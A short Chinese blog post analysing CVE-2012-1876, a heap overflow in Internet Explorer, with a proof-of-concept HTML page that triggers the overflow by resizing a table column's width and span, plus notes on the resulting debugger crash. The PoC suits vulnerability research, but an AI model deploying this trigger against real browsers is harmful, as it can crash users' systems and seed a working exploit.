CVE-2012-1876漏洞分析
0.POC文件
1 <html> 2 <body> 3 <table style="table-layout:fixed" > 4 <col id="132" width="41" span="1" >  </col> 5 </table> 6 <script> 7 8 function over_trigger() { 9 var obj_col = document.getElementById("132"); 10 obj_col.width = "42765"; 11 obj_col.span = 1000; 12 } 13 14 setTimeout("over_trigger();",10); 15 16 </script> 17 </body> 18 </html>
1.漏洞复现
环境如下
2.漏洞分析
打开POC文件即发生异常,挂载调试器。异常情况如图
注意0x9A99000位置内存不可写入导致异常,图示是增加了写权限后的内存示意图。
分析可知,是堆溢出超出堆边界导致尝试写入不可写入的内存地址而引发了异常。
异常语句如图
edi的值为0x9A99000
mov [0x9A99000],ecx
引发异常
转载于:https://www.cnblogs.com/Ox9A82/p/5311296.html
CVE-2012-1876漏洞分析相关推荐
- 2022CTF培训(十一)IOT 相关 CVE 漏洞分析
附件下载链接 D-Link DIR-823G 固件全系统仿真 2022CTF培训(十)IOT 相关 CVE 漏洞分析 是采用 qemu-user 对个别程序进行仿真,而对于完整的仿真需要使用 qemu ...
- 转载:WPS 2012/2013 RTF fchars 堆溢出漏洞分析
WPS 2012/2013 RTF fchars 堆溢出漏洞分析 On 2013年12月11日, in 安全分析, by code_audit_labs by phperl ,zzf,nine8 of ...
- 国产软件CVE漏洞分析系列:泛微OA系统 漏洞编号:SSV-91661
今天开始扒拉一下各种国产软件已经公布的漏洞,有些公司自己把漏洞保密起来,其实真是傻啦吧唧的,以为不让大家知道,漏洞就不存在吗!没办法,可能也是为了上市公司的股价吧.普通人对于漏洞的理解还是有点狼来了的 ...
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- CVE-2020-1472 Netlogon特权提升漏洞分析及复现
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新 ...
- CVE-2022-26923漏洞分析
漏洞简介 2022年5月10日,微软发布补丁修复了一个AD域权限提升漏洞(CVE-2022–26923).该漏洞是由于在申请证书时对AD域中的计算机账户身份审核不够严格,经过身份验证的攻击者可以操纵他 ...
- 公开仓库中Docker镜像的漏洞分析结果发布
Federacy的一名研究人员发布了一项报告,该报告分析了公开仓库中Docker镜像的漏洞.24%的镜像发现了明显的漏洞,其中基于Ubuntu的镜像漏洞最多,而基于Debian的镜像漏洞最少. \\ ...
- cve-2019-11076 Cribl UI 1.5.0 未授权命令执行漏洞分析
Cribl是一款日志分析工具.Cribl UI是其中的一个用户界面. Cribl UI 1.5.0版本中存在安全漏洞.远程攻击者可借助未认证的Web请求利用该漏洞运行任意命令. 前言 前几天瞎逛 Gi ...
- cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析
前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度.正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响. 这个漏洞存在于思科Prime Infrastructu ...
- linux “大脏牛”漏洞分析(CVE-2017-1000405)
一.背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android.桌面版和服务器版都受到其影响.恶意攻击者通过该漏洞可以轻易 ...
最新文章
- COM组件转换成.NET组件[转]
- tiny4412学习之u-boot启动过程
- datatables
- VC由进程ID获取窗口句柄的各种方
- Ubuntu 18.04 LTS环境下 MNN 的编译与使用
- DataProtection设置问题引起不同ASP.NET Core站点无法共享用户验证Cookie
- excel批量插入 配置yml
- 七月二十一日!! NVIDIA DLI 深度学习入门课程——计算机视觉
- PHP怎么接收字符串,求大神救命!!php接收到是空的字符串
- n对括号问题,(求n对括号的正确排列有多少)
- NetScaler的Web 2.0 Push技术
- 为什么图片保存类型360 se html document,360安全浏览器为什么图片不显示保存
- 诺基亚Nokia的PC套件导出短信乱码问题解决(转)
- 【测试能力提升】Jira 和禅道数据库分析,方便你写周报、写总结、出报告
- problem.conf配置内容
- Linux学习笔记——Linux基本命令篇
- Android Calander Event
- 一种基于Android的卡拉
- base64编码,原理是什么,有什么作用?
- Cobertura计算覆盖率
热门文章
- javaweb增删改查实例_JavaWeb图像可视化管理系统之后台搭建(二)用户管理与增删改查(内含代码)...
- primefaces教程_Primefaces,带有JPA的Spring 4(Hibernate 4 / EclipseLink)示例教程
- JUnit测试用例– Eclipse和Maven
- adalm pluto_将Apache Pluto与Lucene搜索引擎示例教程集成
- 通过ssh访问git项目
- C结构和C++结构之间的区别是什么?
- 未来人工智能应用体现出的核心技术有哪些?
- 开课吧Java课堂:小应用程序基础是什么
- 【实战】Vue 中 Props 值因异步获取导致的报错问题解析
- linux修改文件的权限和修改文件所有者和所属组